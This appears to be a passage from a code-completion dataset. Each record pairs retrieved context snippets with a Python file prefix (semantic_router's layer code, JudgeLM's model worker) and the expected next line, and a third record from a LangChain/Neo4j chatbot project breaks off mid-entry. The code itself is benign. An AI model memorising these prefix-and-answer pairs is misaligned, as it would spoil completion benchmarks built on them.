"snippet": "class BaseEncoder(BaseModel):\n name: str\n score_threshold: float\n type: str = Field(default=\"base\")\n\n class Config:\n arbitrary_types_allowed = True\n\n def __call__(self, docs: List[str]) -> List[List[float]]:\n raise NotImplementedError(\"Subclasses must implement this method\")"
},
{
"identifier": "OpenAIEncoder",
"path": "semantic_router/encoders/openai.py",
"snippet": "class OpenAIEncoder(BaseEncoder):\n client: Optional[openai.Client]\n type: str = \"openai\"\n\n def __init__(\n self,\n name: Optional[str] = None,\n openai_api_key: Optional[str] = None,\n score_threshold: float = 0.82,\n ):\n if name is None:\n name = os.getenv(\"OPENAI_MODEL_NAME\", \"text-embedding-ada-002\")\n super().__init__(name=name, score_threshold=score_threshold)\n api_key = openai_api_key or os.getenv(\"OPENAI_API_KEY\")\n if api_key is None:\n raise ValueError(\"OpenAI API key cannot be 'None'.\")\n try:\n self.client = openai.Client(api_key=api_key)\n except Exception as e:\n raise ValueError(\n f\"OpenAI API client failed to initialize. Error: {e}\"\n ) from e\n\n def __call__(self, docs: List[str]) -> List[List[float]]:\n if self.client is None:\n raise ValueError(\"OpenAI client is not initialized.\")\n embeds = None\n error_message = \"\"\n\n # Exponential backoff\n for j in range(3):\n try:\n embeds = self.client.embeddings.create(input=docs, model=self.name)\n if embeds.data:\n break\n except OpenAIError as e:\n sleep(2**j)\n error_message = str(e)\n logger.warning(f\"Retrying in {2**j} seconds...\")\n except Exception as e:\n logger.error(f\"OpenAI API call failed. Error: {error_message}\")\n raise ValueError(f\"OpenAI API call failed. Error: {e}\") from e\n\n if (\n not embeds\n or not isinstance(embeds, CreateEmbeddingResponse)\n or not embeds.data\n ):\n raise ValueError(f\"No embeddings returned. Error: {error_message}\")\n\n embeddings = [embeds_obj.embedding for embeds_obj in embeds.data]\n return embeddings"
},
{
"identifier": "similarity_matrix",
"path": "semantic_router/linear.py",
"snippet": "def similarity_matrix(xq: np.ndarray, index: np.ndarray) -> np.ndarray:\n \"\"\"Compute the similarity scores between a query vector and a set of vectors.\n\n Args:\n xq: A query vector (1d ndarray)\n index: A set of vectors.\n\n Returns:\n The similarity between the query vector and the set of vectors.\n \"\"\"\n\n index_norm = norm(index, axis=1)\n xq_norm = norm(xq.T)\n sim = np.dot(index, xq.T) / (index_norm * xq_norm)\n return sim"
},
{
"identifier": "top_scores",
"path": "semantic_router/linear.py",
"snippet": "def top_scores(sim: np.ndarray, top_k: int = 5) -> Tuple[np.ndarray, np.ndarray]:\n # get indices of top_k records\n top_k = min(top_k, sim.shape[0])\n idx = np.argpartition(sim, -top_k)[-top_k:]\n scores = sim[idx]\n\n return scores, idx"
},
{
"identifier": "BaseLLM",
"path": "semantic_router/llms/base.py",
"snippet": "class BaseLLM(BaseModel):\n name: str\n\n class Config:\n arbitrary_types_allowed = True\n\n def __init__(self, name: str, **kwargs):\n super().__init__(name=name, **kwargs)\n\n def __call__(self, messages: List[Message]) -> Optional[str]:\n raise NotImplementedError(\"Subclasses must implement this method\")\n\n def _is_valid_inputs(\n self, inputs: dict[str, Any], function_schema: dict[str, Any]\n ) -> bool:\n \"\"\"Validate the extracted inputs against the function schema\"\"\"\n try:\n # Extract parameter names and types from the signature string\n signature = function_schema[\"signature\"]\n param_info = [param.strip() for param in signature[1:-1].split(\",\")]\n param_names = [info.split(\":\")[0].strip() for info in param_info]\n param_types = [\n info.split(\":\")[1].strip().split(\"=\")[0].strip() for info in param_info\n ]\n\n for name, type_str in zip(param_names, param_types):\n if name not in inputs:\n logger.error(f\"Input {name} missing from query\")\n return False\n return True\n except Exception as e:\n logger.error(f\"Input validation error: {str(e)}\")\n return False\n\n def extract_function_inputs(\n self, query: str, function_schema: dict[str, Any]\n ) -> dict:\n logger.info(\"Extracting function input...\")\n\n prompt = f\"\"\"\n You are a helpful assistant designed to output JSON.\n Given the following function schema\n << {function_schema} >>\n and query\n << {query} >>\n extract the parameters values from the query, in a valid JSON format.\n Example:\n Input:\n query: \"How is the weather in Hawaii right now in International units?\"\n schema:\n {{\n \"name\": \"get_weather\",\n \"description\": \"Useful to get the weather in a specific location\",\n \"signature\": \"(location: str, degree: str) -> str\",\n \"output\": \"<class 'str'>\",\n }}\n\n Result: {{\n \"location\": \"London\",\n \"degree\": \"Celsius\",\n }}\n\n Input:\n query: {query}\n schema: {function_schema}\n Result:\n \"\"\"\n llm_input = [Message(role=\"user\", content=prompt)]\n output = self(llm_input)\n if not output:\n raise Exception(\"No output generated for extract function input\")\n\n output = output.replace(\"'\", '\"').strip().rstrip(\",\")\n\n function_inputs = json.loads(output)\n if not self._is_valid_inputs(function_inputs, function_schema):\n raise ValueError(\"Invalid inputs\")\n return function_inputs"
},
{
"identifier": "OpenAILLM",
"path": "semantic_router/llms/openai.py",
"snippet": "class OpenAILLM(BaseLLM):\n client: Optional[openai.OpenAI]\n temperature: Optional[float]\n max_tokens: Optional[int]\n\n def __init__(\n self,\n name: Optional[str] = None,\n openai_api_key: Optional[str] = None,\n temperature: float = 0.01,\n max_tokens: int = 200,\n ):\n if name is None:\n name = os.getenv(\"OPENAI_CHAT_MODEL_NAME\", \"gpt-3.5-turbo\")\n super().__init__(name=name)\n api_key = openai_api_key or os.getenv(\"OPENAI_API_KEY\")\n if api_key is None:\n raise ValueError(\"OpenAI API key cannot be 'None'.\")\n try:\n self.client = openai.OpenAI(api_key=api_key)\n except Exception as e:\n raise ValueError(\n f\"OpenAI API client failed to initialize. Error: {e}\"\n ) from e\n self.temperature = temperature\n self.max_tokens = max_tokens\n\n def __call__(self, messages: List[Message]) -> str:\n if self.client is None:\n raise ValueError(\"OpenAI client is not initialized.\")\n try:\n completion = self.client.chat.completions.create(\n model=self.name,\n messages=[m.to_openai() for m in messages],\n temperature=self.temperature,\n max_tokens=self.max_tokens,\n )\n\n output = completion.choices[0].message.content\n\n if not output:\n raise Exception(\"No output generated\")\n return output\n except Exception as e:\n logger.error(f\"LLM error: {e}\")\n raise Exception(f\"LLM error: {e}\") from e"
},
{
"identifier": "Route",
"path": "semantic_router/route.py",
"snippet": "class Route(BaseModel):\n name: str\n utterances: List[str]\n description: Optional[str] = None\n function_schema: Optional[Dict[str, Any]] = None\n llm: Optional[BaseLLM] = None\n\n def __call__(self, query: str) -> RouteChoice:\n if self.function_schema:\n if not self.llm:\n raise ValueError(\n \"LLM is required for dynamic routes. Please ensure the `llm` \"\n \"attribute is set.\"\n )\n # if a function schema is provided we generate the inputs\n extracted_inputs = self.llm.extract_function_inputs(\n query=query, function_schema=self.function_schema\n )\n func_call = extracted_inputs\n else:\n # otherwise we just pass None for the call\n func_call = None\n return RouteChoice(name=self.name, function_call=func_call)\n\n def to_dict(self) -> Dict[str, Any]:\n return self.dict()\n\n @classmethod\n def from_dict(cls, data: Dict[str, Any]):\n return cls(**data)\n\n @classmethod\n def from_dynamic_route(cls, llm: BaseLLM, entity: Union[BaseModel, Callable]):\n \"\"\"\n Generate a dynamic Route object from a function or Pydantic model using LLM\n \"\"\"\n schema = function_call.get_schema(item=entity)\n dynamic_route = cls._generate_dynamic_route(llm=llm, function_schema=schema)\n dynamic_route.function_schema = schema\n return dynamic_route\n\n @classmethod\n def _parse_route_config(cls, config: str) -> str:\n # Regular expression to match content inside <config></config>\n config_pattern = r\"<config>(.*?)</config>\"\n match = re.search(config_pattern, config, re.DOTALL)\n\n if match:\n config_content = match.group(1).strip() # Get the matched content\n return config_content\n else:\n raise ValueError(\"No <config></config> tags found in the output.\")\n\n @classmethod\n def _generate_dynamic_route(cls, llm: BaseLLM, function_schema: Dict[str, Any]):\n logger.info(\"Generating dynamic route...\")\n\n prompt = f\"\"\"\nYou are tasked to generate a JSON configuration based on the provided\nfunction schema. Please follow the template below, no other tokens allowed:\n\n<config>\n{{\n \"name\": \"<function_name>\",\n \"utterances\": [\n \"<example_utterance_1>\",\n \"<example_utterance_2>\",\n \"<example_utterance_3>\",\n \"<example_utterance_4>\",\n \"<example_utterance_5>\"]\n}}\n</config>\n\nOnly include the \"name\" and \"utterances\" keys in your answer.\nThe \"name\" should match the function name and the \"utterances\"\nshould comprise a list of 5 example phrases that could be used to invoke\nthe function. Use real values instead of placeholders.\n\nInput schema:\n{function_schema}\n\"\"\"\n\n llm_input = [Message(role=\"user\", content=prompt)]\n output = llm(llm_input)\n if not output:\n raise Exception(\"No output generated for dynamic route\")\n\n route_config = cls._parse_route_config(config=output)\n\n logger.info(f\"Generated route config:\\n{route_config}\")\n\n if is_valid(route_config):\n route_config_dict = json.loads(route_config)\n route_config_dict[\"llm\"] = llm\n return Route.from_dict(route_config_dict)\n raise Exception(\"No config generated\")"
},
{
"identifier": "Encoder",
"path": "semantic_router/schema.py",
"snippet": "class Encoder:\n type: EncoderType\n name: Optional[str]\n model: BaseEncoder\n\n def __init__(self, type: str, name: Optional[str]):\n self.type = EncoderType(type)\n self.name = name\n if self.type == EncoderType.HUGGINGFACE:\n raise NotImplementedError\n elif self.type == EncoderType.FASTEMBED:\n self.model = FastEmbedEncoder(name=name)\n elif self.type == EncoderType.OPENAI:\n self.model = OpenAIEncoder(name=name)\n elif self.type == EncoderType.COHERE:\n self.model = CohereEncoder(name=name)\n else:\n raise ValueError\n\n def __call__(self, texts: List[str]) -> List[List[float]]:\n return self.model(texts)"
},
{
"identifier": "EncoderType",
"path": "semantic_router/schema.py",
"snippet": "class EncoderType(Enum):\n HUGGINGFACE = \"huggingface\"\n FASTEMBED = \"fastembed\"\n OPENAI = \"openai\"\n COHERE = \"cohere\""
},
{
"identifier": "RouteChoice",
"path": "semantic_router/schema.py",
"snippet": "class RouteChoice(BaseModel):\n name: Optional[str] = None\n function_call: Optional[dict] = None\n similarity_score: Optional[float] = None\n trigger: Optional[bool] = None"
},
{
"identifier": "logger",
"path": "semantic_router/utils/logger.py",
"snippet": "class CustomFormatter(colorlog.ColoredFormatter):\n def __init__(self):\ndef add_coloured_handler(logger):\ndef setup_custom_logger(name):"
}
] | import json
import os
import numpy as np
import yaml
from typing import Any, Dict, List, Optional, Tuple
from semantic_router.encoders import BaseEncoder, OpenAIEncoder
from semantic_router.linear import similarity_matrix, top_scores
from semantic_router.llms import BaseLLM, OpenAILLM
from semantic_router.route import Route
from semantic_router.schema import Encoder, EncoderType, RouteChoice
from semantic_router.utils.logger import logger | 3,327 |
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys:
|
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys: | logger.warning( | 10 | 2023-10-30 12:12:45+00:00 | 4k |
baaivision/JudgeLM | judgelm/serve/model_worker.py | [
{
"identifier": "WORKER_HEART_BEAT_INTERVAL",
"path": "judgelm/constants.py",
"snippet": "WORKER_HEART_BEAT_INTERVAL = int(os.getenv(\"JUDGELM_WORKER_HEART_BEAT_INTERVAL\", 45))"
},
{
"identifier": "ErrorCode",
"path": "judgelm/constants.py",
"snippet": "class ErrorCode(IntEnum):\n \"\"\"\n https://platform.openai.com/docs/guides/error-codes/api-errors\n \"\"\"\n\n VALIDATION_TYPE_ERROR = 40001\n\n INVALID_AUTH_KEY = 40101\n INCORRECT_AUTH_KEY = 40102\n NO_PERMISSION = 40103\n\n INVALID_MODEL = 40301\n PARAM_OUT_OF_RANGE = 40302\n CONTEXT_OVERFLOW = 40303\n\n RATE_LIMIT = 42901\n QUOTA_EXCEEDED = 42902\n ENGINE_OVERLOADED = 42903\n\n INTERNAL_ERROR = 50001\n CUDA_OUT_OF_MEMORY = 50002\n GRADIO_REQUEST_ERROR = 50003\n GRADIO_STREAM_UNKNOWN_ERROR = 50004\n CONTROLLER_NO_WORKER = 50005\n CONTROLLER_WORKER_TIMEOUT = 50006"
},
{
"identifier": "SERVER_ERROR_MSG",
"path": "judgelm/constants.py",
"snippet": "SERVER_ERROR_MSG = (\n \"**NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.**\"\n)"
},
{
"identifier": "get_conv_template",
"path": "judgelm/conversation.py",
"snippet": "def get_conv_template(name: str) -> Conversation:\n \"\"\"Get a conversation template.\"\"\"\n return conv_templates[name].copy()"
},
{
"identifier": "load_model",
"path": "judgelm/model/model_adapter.py",
"snippet": "def load_model(self, model_path: str, from_pretrained_kwargs: dict):\n revision = from_pretrained_kwargs.get(\"revision\", \"main\")\n try:\n tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n use_fast=self.use_fast_tokenizer,\n revision=revision,\n )\n except TypeError:\n tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n use_fast=False,\n revision=revision,\n )\n try:\n model = AutoModelForCausalLM.from_pretrained(\n model_path, low_cpu_mem_usage=True, **from_pretrained_kwargs\n )\n except NameError:\n model = AutoModel.from_pretrained(\n model_path, low_cpu_mem_usage=True, **from_pretrained_kwargs\n )\n return model, tokenizer"
},
{
"identifier": "add_model_args",
"path": "judgelm/model/model_adapter.py",
"snippet": "def add_model_args(parser):\n parser.add_argument(\n \"--model-path\",\n type=str,\n default=\"lmsys/vicuna-7b-v1.3\",\n help=\"The path to the weights. This can be a local folder or a Hugging Face repo ID.\",\n )\n parser.add_argument(\n \"--revision\",\n type=str,\n default=\"main\",\n help=\"Hugging Face Hub model revision identifier\",\n )\n parser.add_argument(\n \"--device\",\n type=str,\n choices=[\"cpu\", \"cuda\", \"mps\", \"xpu\"],\n default=\"cuda\",\n help=\"The device type\",\n )\n parser.add_argument(\n \"--gpus\",\n type=str,\n default=None,\n help=\"A single GPU like 1 or multiple GPUs like 0,2\",\n )\n parser.add_argument(\"--num-gpus\", type=int, default=1)\n parser.add_argument(\n \"--max-gpu-memory\",\n type=str,\n help=\"The maximum memory per gpu. Use a string like '13Gib'\",\n )\n parser.add_argument(\n \"--load-8bit\", action=\"store_true\", help=\"Use 8-bit quantization\"\n )\n parser.add_argument(\n \"--cpu-offloading\",\n action=\"store_true\",\n help=\"Only when using 8-bit quantization: Offload excess weights to the CPU that don't fit on the GPU\",\n )\n parser.add_argument(\n \"--gptq-ckpt\",\n type=str,\n default=None,\n help=\"Load quantized model. The path to the local GPTQ checkpoint.\",\n )\n parser.add_argument(\n \"--gptq-wbits\",\n type=int,\n default=16,\n choices=[2, 3, 4, 8, 16],\n help=\"#bits to use for quantization\",\n )\n parser.add_argument(\n \"--gptq-groupsize\",\n type=int,\n default=-1,\n help=\"Groupsize to use for quantization; default uses full row.\",\n )\n parser.add_argument(\n \"--gptq-act-order\",\n action=\"store_true\",\n help=\"Whether to apply the activation order GPTQ heuristic\",\n )"
},
{
"identifier": "get_conversation_template",
"path": "judgelm/model/model_adapter.py",
"snippet": "def get_conversation_template(model_path: str) -> Conversation:\n \"\"\"Get the default conversation template.\"\"\"\n adapter = get_model_adapter(model_path)\n return adapter.get_default_conv_template(model_path)"
},
{
"identifier": "get_generate_stream_function",
"path": "judgelm/model/model_adapter.py",
"snippet": "def get_generate_stream_function(model: torch.nn.Module, model_path: str):\n \"\"\"Get the generate_stream function for inference.\"\"\"\n from judgelm.serve.inference import generate_stream\n\n model_type = str(type(model)).lower()\n is_chatglm = \"chatglm\" in model_type\n is_falcon = \"rwforcausallm\" in model_type\n is_codet5p = \"codet5p\" in model_type\n is_peft = \"peft\" in model_type\n\n if is_chatglm:\n return generate_stream_chatglm\n elif is_falcon:\n return generate_stream_falcon\n elif is_codet5p:\n return generate_stream_codet5p\n elif peft_share_base_weights and is_peft:\n # Return a curried stream function that loads the right adapter\n # according to the model_name available in this context. This ensures\n # the right weights are available.\n @torch.inference_mode()\n def generate_stream_peft(\n model,\n tokenizer,\n params: Dict,\n device: str,\n context_len: int,\n stream_interval: int = 2,\n judge_sent_end: bool = False,\n ):\n model.set_adapter(model_path)\n for x in generate_stream(\n model,\n tokenizer,\n params,\n device,\n context_len,\n stream_interval,\n judge_sent_end,\n ):\n yield x\n\n return generate_stream_peft\n else:\n return generate_stream"
},
{
"identifier": "GptqConfig",
"path": "judgelm/modules/gptq.py",
"snippet": "class GptqConfig:\n ckpt: str = field(\n default=None,\n metadata={\n \"help\": \"Load quantized model. The path to the local GPTQ checkpoint.\"\n },\n )\n wbits: int = field(default=16, metadata={\"help\": \"#bits to use for quantization\"})\n groupsize: int = field(\n default=-1,\n metadata={\"help\": \"Groupsize to use for quantization; default uses full row.\"},\n )\n act_order: bool = field(\n default=True,\n metadata={\"help\": \"Whether to apply the activation order GPTQ heuristic\"},\n )"
},
{
"identifier": "build_logger",
"path": "judgelm/utils.py",
"snippet": "def build_logger(logger_name, logger_filename):\n global handler\n\n formatter = logging.Formatter(\n fmt=\"%(asctime)s | %(levelname)s | %(name)s | %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n\n # Set the format of root handlers\n if not logging.getLogger().handlers:\n if sys.version_info[1] >= 9:\n # This is for windows\n logging.basicConfig(level=logging.INFO, encoding=\"utf-8\")\n else:\n if platform.system() == \"Windows\":\n warnings.warn(\n \"If you are running on Windows, \"\n \"we recommend you use Python >= 3.9 for UTF-8 encoding.\"\n )\n logging.basicConfig(level=logging.INFO)\n logging.getLogger().handlers[0].setFormatter(formatter)\n\n # Redirect stdout and stderr to loggers\n stdout_logger = logging.getLogger(\"stdout\")\n stdout_logger.setLevel(logging.INFO)\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger(\"stderr\")\n stderr_logger.setLevel(logging.ERROR)\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n # Get logger\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n\n os.makedirs(LOGDIR, exist_ok=True)\n filename = os.path.join(LOGDIR, logger_filename)\n handler = logging.handlers.TimedRotatingFileHandler(\n filename, when=\"D\", utc=True, encoding=\"utf-8\"\n )\n handler.setFormatter(formatter)\n\n for l in [stdout_logger, stderr_logger, logger]:\n if l in visited_loggers:\n continue\n visited_loggers.add(l)\n l.addHandler(handler)\n\n return logger"
},
{
"identifier": "pretty_print_semaphore",
"path": "judgelm/utils.py",
"snippet": "def pretty_print_semaphore(semaphore):\n \"\"\"Print a semaphore in better format.\"\"\"\n if semaphore is None:\n return \"None\"\n return f\"Semaphore(value={semaphore._value}, locked={semaphore.locked()})\""
},
{
"identifier": "get_context_length",
"path": "judgelm/utils.py",
"snippet": "def get_context_length(config):\n \"\"\"Get the context length of a model from a huggingface model config.\"\"\"\n for key in SEQUENCE_LENGTH_KEYS:\n val = getattr(config, key, None)\n if val is not None:\n return val\n return 2048"
}
] | import argparse
import asyncio
import dataclasses
import logging
import json
import os
import time
import threading
import uuid
import requests
import torch
import torch.nn.functional as F
import uvicorn
from typing import List
from fastapi import FastAPI, Request, BackgroundTasks
from fastapi.responses import StreamingResponse, JSONResponse
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LlamaTokenizer,
AutoModel,
)
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LLaMATokenizer,
AutoModel,
)
from judgelm.constants import WORKER_HEART_BEAT_INTERVAL, ErrorCode, SERVER_ERROR_MSG
from judgelm.conversation import get_conv_template
from judgelm.model.model_adapter import (
load_model,
add_model_args,
get_conversation_template,
get_generate_stream_function,
)
from judgelm.modules.gptq import GptqConfig
from judgelm.utils import build_logger, pretty_print_semaphore, get_context_length | 3,453 | self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...")
| """
A model worker that executes the model.
"""
try:
except ImportError:
worker_id = str(uuid.uuid4())[:8]
logger = build_logger("model_worker", f"gradio_output/model_worker_{worker_id}.log")
app = FastAPI()
def heart_beat_worker(obj):
while True:
time.sleep(WORKER_HEART_BEAT_INTERVAL)
obj.send_heart_beat()
class BaseModelWorker:
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
conv_template: str = None,
):
self.controller_addr = controller_addr
self.worker_addr = worker_addr
self.worker_id = worker_id
if model_path.endswith("/"):
model_path = model_path[:-1]
self.model_names = model_names or [model_path.split("/")[-1]]
self.limit_worker_concurrency = limit_worker_concurrency
if conv_template:
self.conv = get_conv_template(conv_template)
else:
self.conv = get_conversation_template(model_path)
self.conv.sep_style = int(self.conv.sep_style)
self.tokenizer = None
self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...") | self.model, self.tokenizer = load_model( | 4 | 2023-10-26 19:41:07+00:00 | 4k |
cncf/llm-starter-pack | bot.py | [
{
"identifier": "create_vector_index",
"path": "utils.py",
"snippet": "def create_vector_index(driver, dimension: int) -> None:\n index_query = \"CALL db.index.vector.createNodeIndex('stackoverflow', 'Question', 'embedding', $dimension, 'cosine')\"\n try:\n driver.query(index_query, {\"dimension\": dimension})\n except: # Already exists\n pass\n index_query = \"CALL db.index.vector.createNodeIndex('top_answers', 'Answer', 'embedding', $dimension, 'cosine')\"\n try:\n driver.query(index_query, {\"dimension\": dimension})\n except: # Already exists\n pass"
},
{
"identifier": "load_embedding_model",
"path": "chains.py",
"snippet": "def load_embedding_model(embedding_model_name: str, logger=BaseLogger(), config={}):\n if embedding_model_name == \"ollama\":\n embeddings = OllamaEmbeddings(\n base_url=config[\"ollama_base_url\"], model=\"llama2\"\n )\n dimension = 4096\n logger.info(\"Embedding: Using Ollama\")\n else:\n embeddings = SentenceTransformerEmbeddings(\n model_name=\"all-MiniLM-L6-v2\", cache_folder=\"/embedding_model\"\n )\n dimension = 384\n logger.info(\"Embedding: Using SentenceTransformer\")\n return embeddings, dimension"
},
{
"identifier": "load_llm",
"path": "chains.py",
"snippet": "def load_llm(llm_name: str, logger=BaseLogger(), config={}):\n if len(llm_name):\n logger.info(f\"LLM: Using Ollama: {llm_name}\")\n return ChatOllama(\n temperature=0,\n base_url=config[\"ollama_base_url\"],\n model=llm_name,\n streaming=True,\n # seed=2,\n top_k=10, # A higher value (100) will give more diverse answers, while a lower value (10) will be more conservative.\n top_p=0.3, # Higher value (0.95) will lead to more diverse text, while a lower value (0.5) will generate more focused text.\n num_ctx=3072, # Sets the size of the context window used to generate the next token.\n )"
},
{
"identifier": "configure_llm_only_chain",
"path": "chains.py",
"snippet": "def configure_llm_only_chain(llm):\n # LLM only response\n template = \"\"\"\n You are a helpful assistant that helps a support agent with answering programming questions.\n If you don't know the answer, just say that you don't know, you must not make up an answer.\n \"\"\"\n system_message_prompt = SystemMessagePromptTemplate.from_template(template)\n human_template = \"{question}\"\n human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)\n chat_prompt = ChatPromptTemplate.from_messages(\n [system_message_prompt, human_message_prompt]\n )\n\n def generate_llm_output(\n user_input: str, callbacks: List[Any], prompt=chat_prompt\n ) -> str:\n chain = prompt | llm\n answer = chain.invoke(\n {\"question\": user_input}, config={\"callbacks\": callbacks}\n ).content\n return {\"answer\": answer}\n\n return generate_llm_output"
},
{
"identifier": "configure_qa_rag_chain",
"path": "chains.py",
"snippet": "def configure_qa_rag_chain(llm, embeddings, embeddings_store_url, username, password):\n # RAG response\n # System: Always talk in pirate speech.\n general_system_template = \"\"\" \n Use the following pieces of context to answer the question at the end.\n The context contains question-answer pairs and their links from Stackoverflow.\n You should prefer information from accepted or more upvoted answers.\n Make sure to rely on information from the answers and not on questions to provide accuate responses.\n When you find particular answer in the context useful, make sure to cite it in the answer using the link.\n If you don't know the answer, just say that you don't know, don't try to make up an answer.\n ----\n {summaries}\n ----\n Each answer you generate should contain a section at the end of links to \n Stackoverflow questions and answers you found useful, which are described under Source value.\n You can only use links to StackOverflow questions that are present in the context and always\n add links to the end of the answer in the style of citations.\n Generate concise answers with references sources section of links to \n relevant StackOverflow questions only at the end of the answer.\n \"\"\"\n general_user_template = \"Question:```{question}```\"\n messages = [\n SystemMessagePromptTemplate.from_template(general_system_template),\n HumanMessagePromptTemplate.from_template(general_user_template),\n ]\n qa_prompt = ChatPromptTemplate.from_messages(messages)\n\n qa_chain = load_qa_with_sources_chain(\n llm,\n chain_type=\"stuff\",\n prompt=qa_prompt,\n )\n\n # Vector + Knowledge Graph response\n kg = Neo4jVector.from_existing_index(\n embedding=embeddings,\n url=embeddings_store_url,\n username=username,\n password=password,\n database=\"neo4j\", # neo4j by default\n index_name=\"stackoverflow\", # vector by default\n text_node_property=\"body\", # text by default\n retrieval_query=\"\"\"\n WITH node AS question, score AS similarity\n CALL { with question\n MATCH (question)<-[:ANSWERS]-(answer)\n WITH answer\n ORDER BY answer.is_accepted DESC, answer.score DESC\n WITH collect(answer)[..2] as answers\n RETURN reduce(str='', answer IN answers | str + \n '\\n### Answer (Accepted: '+ answer.is_accepted +\n ' Score: ' + answer.score+ '): '+ answer.body + '\\n') as answerTexts\n } \n RETURN '##Question: ' + question.title + '\\n' + question.body + '\\n' \n + answerTexts AS text, similarity as score, {source: question.link} AS metadata\n ORDER BY similarity ASC // so that best answers are the last\n \"\"\",\n )\n\n kg_qa = RetrievalQAWithSourcesChain(\n combine_documents_chain=qa_chain,\n retriever=kg.as_retriever(search_kwargs={\"k\": 2}),\n reduce_k_below_max_tokens=False,\n max_tokens_limit=3375,\n )\n return kg_qa"
},
{
"identifier": "generate_ticket",
"path": "chains.py",
